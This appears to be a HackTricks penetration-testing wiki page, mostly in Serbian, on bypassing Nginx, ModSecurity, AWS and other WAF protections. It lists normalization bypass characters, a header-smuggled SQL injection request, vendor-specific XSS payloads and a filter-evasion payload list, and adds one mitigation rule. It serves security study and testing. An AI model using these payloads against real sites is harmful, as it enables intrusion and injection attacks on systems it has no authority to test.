# Proxy / WAF Zaobilaženje zaštita

{{#include ../banners/hacktricks-training.md}}


## Zaobilaženje Nginx ACL pravila pomoću Pathname Manipulation <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>

Tehnike [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).

Primer Nginx pravila:
```plaintext
location = /admin {
deny all;
}

location = /admin/ {
deny all;
}
```
Da bi sprečio zaobilaženja Nginx izvodi normalizaciju putanje pre nego što je proveri. Međutim, ako backend server izvrši drugačiju normalizaciju (uklanjajući karaktere koje nginx ne uklanja), može biti moguće zaobići ovu zaštitu.

### **NodeJS - Express**

| Nginx verzija | **Node.js karakteri za zaobilaženje** |
| ------------- | ------------------------------------- |
| 1.22.0        | `\xA0`                                |
| 1.21.6        | `\xA0`                                |
| 1.20.2        | `\xA0`, `\x09`, `\x0C`                |
| 1.18.0        | `\xA0`, `\x09`, `\x0C`                |
| 1.16.1        | `\xA0`, `\x09`, `\x0C`                |

### **Flask**

| Nginx verzija | **Flask karakteri za zaobilaženje**                                |
| ------------- | ------------------------------------------------------------------ |
| 1.22.0        | `\x85`, `\xA0`                                                     |
| 1.21.6        | `\x85`, `\xA0`                                                     |
| 1.20.2        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`     |
| 1.18.0        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`     |
| 1.16.1        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`     |

### **Spring Boot**

| Nginx verzija | **Spring Boot karakteri za zaobilaženje** |
| ------------- | ----------------------------------------- |
| 1.22.0        | `;`                                       |
| 1.21.6        | `;`                                       |
| 1.20.2        | `\x09`, `;`                               |
| 1.18.0        | `\x09`, `;`                               |
| 1.16.1        | `\x09`, `;`                               |

### **PHP-FPM**

Nginx FPM konfiguracija:
```plaintext
location = /admin.php {
deny all;
}

location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
```
Nginx je konfigurisan da blokira pristup `/admin.php`, ali je moguće bypass ovog ograničenja pristupom `/admin.php/index.php`.

### Kako sprečiti
```plaintext
location ~* ^/admin {
deny all;
}
```
## Bypass Mod Security Rules <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>

### Path Confusion

[**In this post**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) je objašnjeno da ModSecurity v3 (until 3.0.12), **improperly implemented the `REQUEST_FILENAME`** varijablu koja je trebalo da sadrži pristupljenu putanju (do početka parametara). Ovo je zato što je izvršavao URL decode da dobije putanju.\
Dakle, zahtev kao `http://example.com/foo%3f';alert(1);foo=` u mod security će pretpostaviti da je putanja samo `/foo` zato što se `%3f` transformiše u `?` koji završava URL putanju, ali zapravo putanja koju će server primiti biće `/foo%3f';alert(1);foo=`.

Varijable `REQUEST_BASENAME` i `PATH_INFO` su takođe bile pogođene ovim bagom.

Nešto slično se desilo u verziji 2 Mod Security koja je dozvoljavala zaobilaženje zaštite koja je sprečavala korisnika da pristupi fajlovima sa određenim ekstenzijama vezanim za backup fajlove (kao što je `.bak`) jednostavno slanjem tačke URL enkodovane kao `%2e`, na primer: `https://example.com/backup%2ebak`.

## Bypass AWS WAF ACL <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>

### Malformed Header

[This research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) pominje da je bilo moguće zaobići AWS WAF rules primenjivane na HTTP headers slanjem "malformed" headera koji nije bio pravilno parsiran od strane AWS, ali jeste od strane backend servera.

For example, sending the following request with a SQL injection in the header X-Query:
```http
GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n
```
It was possible to bypass AWS WAF because it wouldn't understand that the next line is part of the value of the header while the NODEJS server did (this was fixed).

## Generički WAF bypasses

### Ograničenja veličine zahteva

Commonly WAFs have a certain length limit of requests to check and if a POST/PUT/PATCH request is over it, the WAF won't check the request.

- Za AWS WAF, you can [**check the documentation**](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)**:**

<table data-header-hidden><thead><tr><th width="687"></th><th></th></tr></thead><tbody><tr><td>Maksimalna veličina tela web zahteva koja može biti pregledana za Application Load Balancer i AWS AppSync zaštite</td><td>8 KB</td></tr><tr><td>Maksimalna veličina tela web zahteva koja može biti pregledana za CloudFront, API Gateway, Amazon Cognito, App Runner, i Verified Access zaštite**</td><td>64 KB</td></tr></tbody></table>

- From [**Azure docs**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**:**

Older Web Application Firewalls with Core Rule Set 3.1 (or lower) allow messages larger than **128 KB** by turning off request body inspection, but these messages won't be checked for vulnerabilities. For newer versions (Core Rule Set 3.2 or newer), the same can be done by disabling the maximum request body limit. When a request exceeds the size limit:

If p**revention mode**: Beleži i blokira zahtev.\
If **detection mode**: Pregleda do limita, ignoriše ostatak, i loguje ako `Content-Length` prekorači limit.

- From [**Akamai**](https://community.akamai.com/customers/s/article/Can-WAF-inspect-all-arguments-and-values-in-request-body?language=en_US)**:**

By default, the WAF inspects only the first 8KB of a request. It can increase the limit up to 128KB by adding Advanced Metadata.

- From [**Cloudflare**](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#http-request-body-fields)**:**

Up to 128KB.

### Static assets inspection gaps (.js GETs)

Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with `.js`), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses.

Practical use cases:

- Pošaljite payloads u untrusted headers (npr. `User-Agent`) na GET ka `.js` putanji da izbegnete inspekciju sadržaja, pa odmah zatražite glavni HTML da utičete na keširanu varijantu.
- Koristite fresh/clean IP; jednom kada je IP označen, promene u routingu mogu učiniti tehniku nepouzdanom.
- U Burp Repeater-u, koristite "Send group in parallel" (single-packet style) da utrčite ta dva zahteva (`.js` zatim HTML) kroz isti front-end put.

This pairs well with header-reflection cache poisoning. See:

{{#ref}}
cache-deception/README.md
{{#endref}}

- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)

### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a>
```bash
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
```
### Unicode kompatibilnost <a href="#unicode-compatability" id="unicode-compatability"></a>

U zavisnosti od implementacije normalizacije Unicode (više informacija [ovde](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), karakteri koji su kompatibilni u okviru Unicode-a mogu da zaobiđu WAF i budu interpretirani kao predviđeni payload. Kompatibilni karakteri se mogu naći [ovde](https://www.compart.com/en/unicode).

#### Primer <a href="#example" id="example"></a>
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
＜img src⁼p onerror⁼＇prompt⁽1⁾＇﹥  --> ＜img src=p onerror='prompt(1)'>
```
### Zaobilaženje kontekstualnih WAF-ova pomoću enkodiranja <a href="#ip-rotation" id="ip-rotation"></a>

Kao što je pomenuto u [**this blog post**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization), da bi se zaobišli WAF-ovi koji mogu da održe kontekst korisničkog unosa možemo zloupotrebiti WAF tehnike kako bi zapravo normalizovali korisnički unos.

Na primer, u postu se pominje da je **Akamai je URL-dekodirao korisnički unos 10 puta**. Dakle nešto poput `<input/%2525252525252525253e/onfocus` će Akamai videti kao `<input/>/onfocus` što **možda će smatrati da je u redu jer je tag zatvoren**. Međutim, sve dok aplikacija ne dekodira URL unos 10 puta, žrtva će videti nešto poput `<input/%25252525252525253e/onfocus` što je **i dalje validno za XSS napad**.

To omogućava da **sakrijete payload-e u enkodovanim komponentama** koje će WAF dekodirati i tumačiti, dok žrtva neće.

Pored URL enkodovanja, ovo se može uraditi i sa drugim enkodiranjima kao što su unicode, hex, octal...

U postu su predloženi sledeći konačni bypass-i:

- Akamai:`akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>`
- Imperva:`imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">`
- AWS/Cloudfront:`docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>`
- Cloudflare:`cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">`

Takođe se pominje da, u zavisnosti od **načina na koji neki WAF-ovi razumeju kontekst** korisničkog unosa, može biti moguće zloupotrebiti to. Predloženi primer u blogu je da je Akamai dozvoljavao da se stavi bilo šta između `/*` i `*/` (verovatno zato što se ovo često koristi kao comment). Dakle, SQLinjection kao `/*'or sleep(5)-- -*/` neće biti uhvaćen i biće validan jer je `/*` početni string injekcije, dok je `*/` komentarisano.

Ovakvi problemi sa kontekstom se takođe mogu iskoristiti da **zloupotrebite druge ranjivosti različite od one koju WAF očekuje** da spreči (npr. ovo se može iskoristiti i za XSS).

### H2C Smuggling <a href="#ip-rotation" id="ip-rotation"></a>

{{#ref}}
h2c-smuggling.md
{{#endref}}

### IP Rotation <a href="#ip-rotation" id="ip-rotation"></a>

- [https://github.com/ustayready/fireprox](https://github.com/ustayready/fireprox): Generiše API gateway URL za upotrebu sa ffuf
- [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin): Slično fireprox
- [https://github.com/PortSwigger/ip-rotate](https://github.com/PortSwigger/ip-rotate): Burp Suite plugin koji koristi API gateway IP adrese
- [https://github.com/fyoorer/ShadowClone](https://github.com/fyoorer/ShadowClone): Dinamički određen broj container instanci se aktivira na osnovu veličine ulaznog fajla i faktora podele, pri čemu se ulaz deli na delove za paralelnu obradu — npr. 100 instanci obrađuje 100 delova iz fajla od 10.000 linija sa split factor-om od 100 linija.
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)

### Regex Bypasses

Različite tehnike se mogu koristiti za zaobilaženje regex filtera na firewall-ovima. Primeri uključuju menjanje veličine slova (alternating case), ubacivanje preloma linije i enkodiranje payload-a. Resursi za različite bypass-e možete naći na [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) i [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). Primeri ispod su preuzeti iz [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
```bash
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
## Alati

- [**nowafpls**](https://github.com/assetnote/nowafpls): Burp plugin za dodavanje beskorisnih podataka u zahteve radi zaobilaženja WAFs pomoću dužine

## Reference

- [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
- [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
- [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)


{{#include ../banners/hacktricks-training.md}}